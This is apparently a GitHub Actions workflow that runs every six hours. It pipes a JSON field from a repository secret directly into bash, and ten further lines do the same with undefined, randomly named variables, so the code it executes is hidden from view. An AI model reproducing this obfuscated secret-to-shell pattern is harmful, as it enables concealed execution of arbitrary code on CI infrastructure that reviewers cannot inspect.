name: kanshiss

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kanshiss
        env:
          jul358: ${{ secrets.jul358 }}
        run: |
          echo $jul358 | jq -r .z89 | /bin/bash
          echo $mtk47495 | jq -r .diux76 | /bin/bash
          echo $yoas9 | jq -r .jvwy61 | /bin/bash
          echo $cgq800 | jq -r .nsko0551 | /bin/bash
          echo $dwtwx5343 | jq -r .gzfwk71165 | /bin/bash
          echo $uwo0909 | jq -r .bi763 | /bin/bash
          echo $j85993 | jq -r .dzre1558 | /bin/bash
          echo $ftgtn440 | jq -r .chhl87134 | /bin/bash
          echo $i9928 | jq -r .vkb2023 | /bin/bash
          echo $tros28 | jq -r .bech54131 | /bin/bash
          echo $kkzu605 | jq -r .jh62794 | /bin/bash

